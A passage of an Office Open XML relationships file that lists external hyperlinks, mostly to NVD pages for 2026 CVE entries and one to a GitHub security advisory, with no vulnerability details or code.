Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78462" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80935" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80937" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80989" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84645" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84648" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84650" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85236" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85677" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89009" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89445" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89450" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89493" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89513" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89534" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89569" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89601" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89626" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89663" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89725" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89729" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19486" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44715" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48059" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72708" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73314" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73316" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77111" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80219" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81532" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82578" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88260" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89013" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89146" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89147" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89174" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89176" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89177" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89178" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89250" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89260" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89262" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90444" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-78fp-cf4h-g36p" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38058" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74239" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76199" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79698" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85979" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86299" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86509" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70341" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7863" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80932" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80953" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80967" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81004" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81012" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81017" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89066" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89452" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89465" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89469" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89470" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89471" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89504" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89560" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89588" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89599" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89603" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89615" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89744" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54174" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80469" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81821" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81822" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57161" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77097" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79645" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80985" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81356" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81357" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81378" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81379" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89090" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89554" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89586" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89632" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89665" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89711" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90451" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19991" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49464" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69438" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69827" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78449" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80132" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80133" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81003" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85237" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87606" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89524" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89535" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89547" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89583" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89667" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89682" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89709" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69681" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69777" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19820" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21087" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21090" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21091" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69391" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69426" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69456" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69594" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70334" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72946" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75771" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75862" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75863" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77091" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78484" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78493" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80075" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80178" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80928" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80929" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80931" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80933" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80936" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80944" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80947" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80950" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80952" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80954" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80955" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80959" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80961" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80962" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80971" TargetMode="External" Id="rId330" /><Relationship 